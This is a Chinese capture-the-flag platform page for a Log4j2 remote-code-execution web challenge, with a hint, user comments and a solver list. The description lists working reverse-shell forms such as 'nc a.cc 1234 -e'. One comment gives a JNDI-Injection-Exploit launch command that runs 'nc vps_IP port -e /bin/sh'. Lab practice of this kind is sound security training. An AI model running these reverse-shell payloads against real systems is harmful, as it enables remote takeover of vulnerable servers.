Apache Log4j2 RCEWEB 未解决

分数: 25 金币: 3
题目作者: 云牧青
一  血: yeedo
一血奖励: 8金币
解  决: 503
提  示: 人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描  述:
/bin/bash:x ; /bin/sh √ ; /dev/tcp × ; nc -e x ; nc a.cc 1234 -e √ ;
评论
lotuswhite 5月前

不知道为什么,作者大大wp里的JNDIExploit-1.2-SNAPSHOT.jar反弹shell不成功,但是百度大佬wp里的JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar成功了。我的6金币呜呜

回复 0

genius4282 1年前

裂开,不如自己搭建个本地的复现效率高,同样的步骤,在这里就搞不了还麻烦

回复 0

ctfliu 1年前

不懂,跟着流程走的。阿里云开启虚拟linux,在安全组规则放开所有端口。根据别人的wp走就行。

回复 0

xiaopengy 1年前

请问反弹shell的时候vps端为什么报这个错? 我的vps机是kali的系统。 java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x5e91993f) cannot access

回复 0

Striker123456 1年前

弹回的shell执行不了命令,不知道是不是我的服务器的问题

回复 0

jack12138 1年前

dnslog出不来,但是可以弹shell,估计是禁用dns请求啦?

回复 1
Wencf01 9月前

我也是能弹shell,但是弹不dnslog

回复 0

Striker123456 2年前

必须要外网的VPS么

回复 0
Striker123456 1年前

@简单的很遗憾 哎哎,我的意思是公网地址的VPS也可以把

回复 0

简单的很遗憾 2年前

这个是需要的,没有vps可以vulhub本地复现嘛

回复 1

1317554973 2年前

什么靶场啊 我都用了6金币都没成功 我百度上找一个靶场就直接成功了 骗我金币 搞毛啊

回复 0

13633953641aaa 2年前

有没有师傅遇到vps开启ldap后 telnet -p 不通的问题

回复 0

SecI302 2年前

1.通过ceye是无法判断是否存在漏洞的,但是能正常反弹shell 2.下载JNDI注入工具 3. 启动工具命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc vps_IP port -e /bin/sh" -A vps_IP启动rmi或者ldap服务设置IP工具会返回服务地址的(红色的) 4.复

回复 0

WriteUp

image
18634648362

6 金币

评分(6)

解题动态

栩xu 攻破了该题 2天前
Waxberry 攻破了该题 3天前
15164739795 攻破了该题 26天前
baozongwi 攻破了该题 1月前
Tsukisec 攻破了该题 1月前
bugbiubiubiu 攻破了该题 1月前
coldplay99999 攻破了该题 1月前
2663645309 攻破了该题 1月前
blacklotus0 攻破了该题 1月前
起名好难 攻破了该题 1月前
vnuesa 攻破了该题 2月前
ailx10 攻破了该题 2月前
tsuppari 攻破了该题 2月前
t1tl3d 攻破了该题 3月前
M@ttQiu4 攻破了该题 3月前
mrykz 攻破了该题 3月前
EATMANS 攻破了该题 4月前
nabs 攻破了该题 4月前
zc341 攻破了该题 5月前
Distance; 攻破了该题 5月前
问题反馈